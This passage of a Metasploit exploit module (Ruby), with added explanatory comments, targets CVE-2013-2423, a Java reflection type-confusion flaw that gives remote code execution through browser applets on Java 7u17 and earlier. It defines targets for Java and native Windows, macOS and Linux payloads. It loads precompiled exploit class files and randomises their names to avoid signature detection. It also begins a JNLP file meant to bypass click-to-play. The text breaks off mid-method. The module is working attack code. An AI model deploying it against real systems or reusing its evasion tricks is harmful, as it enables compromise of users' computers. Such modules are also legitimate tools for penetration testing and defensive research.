##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
# Reliability ranking the framework shows for this module.
Rank = ExcellentRanking
# HTTP server support: the JNLP file and applet are served from get_uri (see jnlp_file).
include Msf::Exploit::Remote::HttpServer::HTML
# Executable generation, presumably used by the native (non-Java) targets below.
include Msf::Exploit::EXE
# Browser Autopwn registration. Mixin order is significant in Ruby: a later
# include takes precedence in method lookup, so keep this ordering.
include Msf::Exploit::Remote::BrowserAutopwn
# Tells Browser Autopwn that this module does not need JavaScript on the client.
autopwn_info({ :javascript => false })
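# Module metadata: name, description, references, payload constraints and the
# target table presented to the user. The description text is user-facing, so
# the two "throw" typos have been corrected to "through".
#
# @param info [Hash] metadata supplied by the framework, merged via update_info
def initialize(info = {})
  super( update_info( info,
    'Name' => 'Java Applet Reflection Type Confusion Remote Code Execution',
    'Description' => %q{
This module abuses Java Reflection to generate a Type Confusion, due to a weak
access control when setting final fields on static classes, and run code outside of
the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This
exploit bypasses click-to-play through a specially crafted JNLP file. This bypass is
applied mainly to IE, when Java Web Start can be launched automatically through the
ActiveX control. Otherwise the applet is launched without click-to-play bypass.
},
    'License' => MSF_LICENSE,
    'Author' =>
      [
        'Jeroen Frijters', # Vulnerability discovery and PoC
        'juan vazquez' # Metasploit module
      ],
    # Vendor advisory and upstream fix are listed alongside the original write-ups.
    'References' =>
      [
        [ 'CVE', '2013-2423' ],
        [ 'OSVDB', '92348' ],
        [ 'BID', '59162' ],
        [ 'URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0' ],
        [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html' ],
        [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/b453d9be6b3f' ],
        [ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ]
      ],
    'Platform' => %w{ java linux osx win },
    # Space is the payload size ceiling; no bad characters apply and NOP padding
    # is disabled, which is consistent with the payload being embedded rather than
    # injected into a fixed buffer (assumption — not visible in this chunk).
    'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
    # Target 0 (pure Java payload) is the default; the remaining entries deliver
    # a native x86 payload for the named platform.
    'Targets' =>
      [
        [ 'Generic (Java Payload)',
          {
            'Platform' => ['java'],
            'Arch' => ARCH_JAVA,
          }
        ],
        [ 'Windows x86 (Native Payload)',
          {
            'Platform' => 'win',
            'Arch' => ARCH_X86,
          }
        ],
        [ 'Mac OS X x86 (Native Payload)',
          {
            'Platform' => 'osx',
            'Arch' => ARCH_X86,
          }
        ],
        [ 'Linux x86 (Native Payload)',
          {
            'Platform' => 'linux',
            'Arch' => ARCH_X86,
          }
        ],
      ],
    'DefaultTarget' => 0,
    'DisclosureDate' => '2013-01-10'
  ))
end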
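# Loads the precompiled class files shipped under data/exploits/jre7u17 and
# randomises the names that would otherwise be a static, signature-friendly
# artefact of this module. The repeated open/read/stat sequence is factored
# into read_exploit_class, which uses File.binread for the same binary read.
#
# @raise [Errno::ENOENT] if one of the class files is missing from the data directory
def setup
  @exploit_class = read_exploit_class("Exploit.class")
  @union1_class = read_exploit_class("Union1.class")
  @union2_class = read_exploit_class("Union2.class")
  @system_class = read_exploit_class("SystemClass.class")

  # The random name must be exactly as long as "Exploit" — the original code
  # keys the length off the literal, presumably because the .class file stores
  # the name with an explicit length and a different length would corrupt it.
  # gsub! rewrites every occurrence in the raw bytes.
  @exploit_class_name = rand_text_alpha("Exploit".length)
  @exploit_class.gsub!("Exploit", @exploit_class_name)

  # Random basename for the served JNLP file; jnlp_file builds the URI from it.
  @jnlp_name = rand_text_alpha(8)
  super
end

# Reads one precompiled class file from the framework data directory.
#
# @param name [String] basename of the class file (e.g. "Exploit.class")
# @return [String] raw binary contents of the file
def read_exploit_class(name)
  File.binread(File.join(Msf::Config.data_directory, "exploits", "jre7u17", name))
end
private :read_exploit_class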
def jnlp_file
jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"
jnlp = %Q|